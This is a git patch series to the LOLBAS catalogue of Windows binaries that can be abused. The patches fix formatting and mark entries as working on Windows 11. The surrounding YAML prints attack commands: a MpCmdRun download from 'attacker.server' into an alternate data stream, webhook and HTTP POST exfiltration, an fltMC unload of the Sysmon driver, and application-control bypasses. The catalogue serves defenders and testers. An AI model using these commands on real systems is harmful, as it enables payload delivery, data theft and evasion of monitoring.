From 39d4e815af08990918c62a8fe141308aa54de99b Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 14 Dec 2021 14:57:32 +0000 Subject: [PATCH 01/11] Minor formatting changes (redudant backslashes, incorrect dates, typos, etc.) --- yml/OSBinaries/AppInstaller.yml | 2 +- yml/OSBinaries/Atbroker.yml | 2 +- yml/OSBinaries/Cmdl32.yml | 2 +- yml/OSBinaries/ConfigSecurityPolicy.yml | 2 +- yml/OSBinaries/DataSvcUtil.yml | 4 ++-- yml/OSBinaries/Dllhost.yml | 2 +- yml/OSBinaries/FltMC.yml | 2 +- yml/OSBinaries/IMEWDBLD.yml | 2 +- yml/OSBinaries/MpCmdRun.yml | 2 +- yml/OSBinaries/OfflineScannerShell.yml | 2 +- yml/OSBinaries/OneDriveStandaloneUpdater.yml | 2 +- yml/OSBinaries/PrintBrm.yml | 2 +- yml/OSBinaries/SettingSyncHost.yml | 2 +- yml/OSBinaries/Stordiag.yml | 2 +- yml/OSBinaries/WorkFolders.yml | 2 +- yml/OSLibraries/Ieframe.yml | 2 +- yml/OSLibraries/Setupapi.yml | 4 ++-- yml/OSLibraries/Shdocvw.yml | 6 +++--- yml/OSScripts/CL_mutexverifiers.yml | 2 +- yml/OSScripts/Cl_invocation.yml | 2 +- yml/OtherMSBinaries/Procdump.yml | 2 +- yml/OtherMSBinaries/VSIISExeLauncher.yml | 2 +- 22 files changed, 26 insertions(+), 26 deletions(-) diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml index ddeb505..17d1b89 100644 --- a/yml/OSBinaries/AppInstaller.yml +++ b/yml/OSBinaries/AppInstaller.yml @@ -2,7 +2,7 @@ Name: AppInstaller.exe Description: Tool used for installation of AppX/MSIX applications on Windows 10 Author: 'Wade Hickey' -Created: '2020-12-02' +Created: 2020-12-02 Commands: - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\ diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 45ffc5f..7935735 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: ATBroker.exe /start malware Description: Start a registered Assistive Technology (AT). - Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry. + Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry. Category: Execute Privileges: User MitreID: T1218 diff --git a/yml/OSBinaries/Cmdl32.yml b/yml/OSBinaries/Cmdl32.yml index 275827c..afb8385 100644 --- a/yml/OSBinaries/Cmdl32.yml +++ b/yml/OSBinaries/Cmdl32.yml @@ -2,7 +2,7 @@ Name: cmdl32.exe Description: Microsoft Connection Manager Auto-Download Author: 'Elliot Killick' -Created: '2021-08-26' +Created: 2021-08-26 Commands: - Command: cmdl32 /vpn /lan %cd%\config Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter. diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index bd739c3..1991f85 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -4,7 +4,7 @@ Description: Binary part of Windows Defender. Used to manage settings in Windows Author: 'Ialle Teixeira' Created: 2020-09-04 Commands: - - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile + - Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile Description: Upload file, credentials or data exfiltration in general Usecase: Upload file Category: Upload diff --git a/yml/OSBinaries/DataSvcUtil.yml b/yml/OSBinaries/DataSvcUtil.yml index e5d5c20..37a1028 100644 --- a/yml/OSBinaries/DataSvcUtil.yml +++ b/yml/OSBinaries/DataSvcUtil.yml @@ -2,9 +2,9 @@ Name: DataSvcUtil.exe Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application. Author: 'Ialle Teixeira' -Created: '01/12/2020' +Created: 2020-12-01 Commands: - - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile + - Command: DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile Description: Upload file, credentials or data exfiltration in general Usecase: Upload file Category: Upload diff --git a/yml/OSBinaries/Dllhost.yml b/yml/OSBinaries/Dllhost.yml index beda52f..7dc777c 100644 --- a/yml/OSBinaries/Dllhost.yml +++ b/yml/OSBinaries/Dllhost.yml @@ -2,7 +2,7 @@ Name: Dllhost.exe Description: Used by Windows to DLL Surrogate COM Objects Author: 'Nasreddine Bencherchali' -Created: '2020-11-07' +Created: 2020-11-07 Commands: - Command: dllhost.exe /Processid:{CLSID} Description: Use dllhost.exe to load a registered or hijacked COM Server payload. diff --git a/yml/OSBinaries/FltMC.yml b/yml/OSBinaries/FltMC.yml index 8717c5b..d418061 100644 --- a/yml/OSBinaries/FltMC.yml +++ b/yml/OSBinaries/FltMC.yml @@ -2,7 +2,7 @@ Name: fltMC.exe Description: Filter Manager Control Program used by Windows Author: 'John Lambert' -Created: '2021-09-18' +Created: 2021-09-18 Commands: - Command: fltMC.exe unload SysmonDrv Description: Unloads a driver used by security agents diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml index 2401ae7..f87e700 100644 --- a/yml/OSBinaries/IMEWDBLD.yml +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -2,7 +2,7 @@ Name: IMEWDBLD.exe Description: Microsoft IME Open Extended Dictionary Module Author: 'Wade Hickey' -Created: '2020-03-05' +Created: 2020-03-05 Commands: - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index 33ac149..10b5fa4 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml @@ -18,7 +18,7 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10 - - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe + - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\temp\nicefile.txt:evil.exe Description: Download file to machine and store it in Alternate Data Stream Usecase: Hide downloaded data inton an Alternate Data Stream Category: ADS diff --git a/yml/OSBinaries/OfflineScannerShell.yml b/yml/OSBinaries/OfflineScannerShell.yml index e12ad2c..2f1b8ee 100644 --- a/yml/OSBinaries/OfflineScannerShell.yml +++ b/yml/OSBinaries/OfflineScannerShell.yml @@ -2,7 +2,7 @@ Name: OfflineScannerShell.exe Description: Windows Defender Offline Shell Author: 'Elliot Killick' -Created: '2021-08-16' +Created: 2021-08-16 Commands: - Command: OfflineScannerShell Description: Execute mpclient.dll library in the current working directory diff --git a/yml/OSBinaries/OneDriveStandaloneUpdater.yml b/yml/OSBinaries/OneDriveStandaloneUpdater.yml index b61a6e8..8c69fcb 100644 --- a/yml/OSBinaries/OneDriveStandaloneUpdater.yml +++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml @@ -2,7 +2,7 @@ Name: OneDriveStandaloneUpdater.exe Description: OneDrive Standalone Updater Author: 'Elliot Killick' -Created: '2021-08-22' +Created: 2021-08-22 Commands: - Command: OneDriveStandaloneUpdater Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml index ab90165..cdee207 100644 --- a/yml/OSBinaries/PrintBrm.yml +++ b/yml/OSBinaries/PrintBrm.yml @@ -2,7 +2,7 @@ Name: PrintBrm.exe Description: Printer Migration Command-Line Tool Author: 'Elliot Killick' -Created: '2021-06-21' +Created: 2021-06-21 Commands: - Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip Description: Create a ZIP file from a folder in a remote drive diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index e171778..6c4d9fe 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -2,7 +2,7 @@ Name: SettingSyncHost.exe Description: Host Process for Setting Synchronization Author: 'Elliot Killick' -Created: '2021-08-26' +Created: 2021-08-26 Commands: - Command: SettingSyncHost -LoadAndRunDiagScript anything Description: Execute file specified in %COMSPEC% diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index 8d2b315..653fa1f 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml @@ -2,7 +2,7 @@ Name: Stordiag.exe Description: Storage diagnostic tool Author: 'Eral4m' -Created: '2021-10-21' +Created: 2021-10-21 Commands: - Command: stordiag.exe Description: Once executed, Stordiag.exe will execute schtasks.exe systeminfo.exe and fltmc.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index 6d271a1..adf5a71 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -2,7 +2,7 @@ Name: WorkFolders.exe Description: Work Folders Author: 'Elliot Killick' -Created: '2021-08-16' +Created: 2021-08-16 Commands: - Command: WorkFolders Description: Execute control.exe in the current working directory diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 34f939d..ba04167 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -2,7 +2,7 @@ Name: Ieaframe.dll Description: Internet Browser DLL for translating HTML code. Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index 4295dd3..02264de 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -2,7 +2,7 @@ Name: Setupapi.dll Description: Windows Setup Application Programming Interface Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows - - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf + - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. UseCase: Load an executable payload. Category: Execute diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 8a8dccd..f344462 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -1,12 +1,12 @@ --- Name: Shdocvw.dll Description: Shell Doc Object and Control Library. -Author: +Author: Jimmy (@bohops) Created: 2018-05-25 Commands: - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" - Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Description: Launch an executable payload via proxy through a URL (information) file by calling OpenURL. + Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User MitreID: T1218.011 diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 5a55cf1..3f8748e 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -4,7 +4,7 @@ Description: Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1 + - Command: . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1 Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable. Usecase: Proxy execution Category: Execute diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index 6610eb1..9bfebcb 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml @@ -4,7 +4,7 @@ Description: Aero diagnostics script Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke [args] + - Command: . C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 \nSyncInvoke [args] Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. Usecase: Proxy execution Category: Execute diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index 65cbb04..9d851cf 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml @@ -2,7 +2,7 @@ Name: Procdump(64).exe Description: SysInternals Memory Dump Tool Author: 'Alfie Champion (@ajpc500)' -Created: '2020-10-14' +Created: 2020-10-14 Commands: - Command: procdump.exe -md calc.dll explorer.exe Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 3b5d330..38c1052 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -2,7 +2,7 @@ Name: VSIISExeLauncher.exe Description: Binary will execute specified binary. Part of VS/VScode installation. Author: 'timwhite' -Created: '2021-09-24' +Created: 2021-09-24 Commands: - Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here" Description: The above binary will execute other binary. From 754a451e76396cfd7266d4a6acfb9123d79fd7ab Mon Sep 17 00:00:00 2001 From: Wietze Date: Tue, 14 Dec 2021 15:50:17 +0000 Subject: [PATCH 02/11] Updating entries that have been confirmed to be working on Windows 11 (21H2) --- yml/OSBinaries/AppInstaller.yml | 2 +- yml/OSBinaries/Aspnet_Compiler.yml | 54 +++++++++++------------ yml/OSBinaries/Atbroker.yml | 2 +- yml/OSBinaries/Bitsadmin.yml | 4 +- yml/OSBinaries/Certreq.yml | 4 +- yml/OSBinaries/Certutil.yml | 12 ++--- yml/OSBinaries/Cmd.yml | 4 +- yml/OSBinaries/Cmdkey.yml | 2 +- yml/OSBinaries/Cmdl32.yml | 2 +- yml/OSBinaries/Cmstp.yml | 2 +- yml/OSBinaries/Control.yml | 4 +- yml/OSBinaries/Csc.yml | 4 +- yml/OSBinaries/Cscript.yml | 2 +- yml/OSBinaries/Desktopimgdownldr.yml | 2 +- yml/OSBinaries/Dfsvc.yml | 2 +- yml/OSBinaries/Esentutl.yml | 13 +++--- yml/OSBinaries/Expand.yml | 6 +-- yml/OSBinaries/Explorer.yml | 4 +- yml/OSBinaries/Extexport.yml | 2 +- yml/OSBinaries/Extrac32.yml | 8 ++-- yml/OSBinaries/Findstr.yml | 8 ++-- yml/OSBinaries/FltMC.yml | 2 +- yml/OSBinaries/Forfiles.yml | 4 +- yml/OSBinaries/Ftp.yml | 4 +- yml/OSBinaries/Gpscript.yml | 4 +- yml/OSBinaries/Hh.yml | 4 +- yml/OSBinaries/IMEWDBLD.yml | 2 +- yml/OSBinaries/Ie4uinit.yml | 2 +- yml/OSBinaries/Ilasm.yml | 3 +- yml/OSBinaries/Infdefaultinstall.yml | 2 +- yml/OSBinaries/Installutil.yml | 4 +- yml/OSBinaries/Jsc.yml | 4 +- yml/OSBinaries/Makecab.yml | 6 +-- yml/OSBinaries/Mavinject.yml | 4 +- yml/OSBinaries/Msbuild.yml | 10 ++--- yml/OSBinaries/Msdt.yml | 4 +- yml/OSBinaries/Mshta.yml | 4 +- yml/OSBinaries/Msiexec.yml | 8 ++-- yml/OSBinaries/Netsh.yml | 2 +- yml/OSBinaries/Odbcconf.yml | 4 +- yml/OSBinaries/OfflineScannerShell.yml | 2 +- yml/OSBinaries/Pcalua.yml | 4 +- yml/OSBinaries/Pcwrun.yml | 2 +- yml/OSBinaries/Print.yml | 6 +-- yml/OSBinaries/PrintBrm.yml | 4 +- yml/OSBinaries/Reg.yml | 4 +- yml/OSBinaries/Regasm.yml | 4 +- yml/OSBinaries/Regedit.yml | 4 +- yml/OSBinaries/Regini.yml | 2 +- yml/OSBinaries/Register-cimprovider.yml | 2 +- yml/OSBinaries/Regsvcs.yml | 4 +- yml/OSBinaries/Regsvr32.yml | 8 ++-- yml/OSBinaries/Replace.yml | 4 +- yml/OSBinaries/Rpcping.yml | 4 +- yml/OSBinaries/Rundll32.yml | 16 +++---- yml/OSBinaries/Runonce.yml | 2 +- yml/OSBinaries/Sc.yml | 4 +- yml/OSBinaries/Schtasks.yml | 4 +- yml/OSBinaries/Scriptrunner.yml | 4 +- yml/OSBinaries/Stordiag.yml | 2 +- yml/OSBinaries/Verclsid.yml | 2 +- yml/OSBinaries/Wab.yml | 2 +- yml/OSBinaries/Wmic.yml | 12 ++--- yml/OSBinaries/WorkFolders.yml | 2 +- yml/OSBinaries/Wscript.yml | 6 +-- yml/OSBinaries/Wsreset.yml | 2 +- yml/OSBinaries/Xwizard.yml | 6 +-- yml/OSLibraries/Advpack.yml | 10 ++--- yml/OSLibraries/Dfshim.yml | 58 ++++++++++++------------- yml/OSLibraries/Ieadvpack.yml | 8 ++-- yml/OSLibraries/Shell32.yml | 4 +- yml/OSScripts/CL_LoadAssembly.yml | 4 +- yml/OSScripts/Manage-bde.yml | 4 +- yml/OSScripts/UtilityFunctions.yml | 2 +- yml/OSScripts/Winrm.yml | 6 +-- yml/OSScripts/pester.yml | 2 +- 76 files changed, 221 insertions(+), 215 deletions(-) diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml index ddeb505..ef362a1 100644 --- a/yml/OSBinaries/AppInstaller.yml +++ b/yml/OSBinaries/AppInstaller.yml @@ -10,7 +10,7 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe Detection: diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml index a174cb6..ead4d97 100644 --- a/yml/OSBinaries/Aspnet_Compiler.yml +++ b/yml/OSBinaries/Aspnet_Compiler.yml @@ -1,27 +1,27 @@ ---- -Name: Aspnet_Compiler.exe -Description: ASP.NET Compilation Tool -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u - Description: Execute C# code with the Build Provider and proper folder structure in place. - Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10 -Full_Path: - - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -Code_Sample: - - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules -Resources: - - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ - - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 -Acknowledgement: - - Person: cpl - Handle: '@cpl3h' ---- +--- +Name: Aspnet_Compiler.exe +Description: ASP.NET Compilation Tool +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u + Description: Execute C# code with the Build Provider and proper folder structure in place. + Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe +Code_Sample: + - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules +Resources: + - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ + - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 +Acknowledgement: + - Person: cpl + Handle: '@cpl3h' +--- diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 45ffc5f..feb81ea 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index 9a6f56b..3476039 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml @@ -10,14 +10,14 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset Description: Command for copying cmd.exe to another folder Usecase: Copy file diff --git a/yml/OSBinaries/Certreq.yml b/yml/OSBinaries/Certreq.yml index 186e166..f5fe723 100644 --- a/yml/OSBinaries/Certreq.yml +++ b/yml/OSBinaries/Certreq.yml @@ -10,14 +10,14 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST Usecase: Upload Category: Upload Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\certreq.exe - Path: C:\Windows\SysWOW64\certreq.exe diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index f31d2f7..0e116d5 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -10,42 +10,42 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe Description: Download and save 7zip to disk in the current folder. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt Description: Download and save a PS1 file to an Alternate Data Stream (ADS). Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil -encode inputFileName encodedOutputFileName Description: Command to encode a file using Base64 Usecase: Encode files to evade defensive measures Category: Encode Privileges: User MitreID: T1027 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil -decode encodedInputFileName decodedOutputFileName Description: Command to decode a Base64 encoded file. Usecase: Decode files to evade defensive measures Category: Decode Privileges: User MitreID: T1140 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil --decodehex encoded_hexadecimal_InputFileName Description: Command to decode a hexadecimal-encoded file decodedOutputFileName Usecase: Decode files to evade defensive measures Category: Decode Privileges: User MitreID: T1140 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\certutil.exe - Path: C:\Windows\SysWOW64\certutil.exe diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index c67db32..20a8eff 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml @@ -10,14 +10,14 @@ Commands: Category: ADS Privileges: User MitreID: T1059.003 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: cmd.exe - < fakefile.doc:payload.bat Description: Execute payload.bat stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS Privileges: User MitreID: T1059.003 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\cmd.exe - Path: C:\Windows\SysWOW64\cmd.exe diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index 90ef75d..c2ade63 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml @@ -10,7 +10,7 @@ Commands: Category: Credentials Privileges: User MitreID: T1078 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\cmdkey.exe - Path: C:\Windows\SysWOW64\cmdkey.exe diff --git a/yml/OSBinaries/Cmdl32.yml b/yml/OSBinaries/Cmdl32.yml index 275827c..ac47b2f 100644 --- a/yml/OSBinaries/Cmdl32.yml +++ b/yml/OSBinaries/Cmdl32.yml @@ -10,7 +10,7 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows Vista, Windows 7, 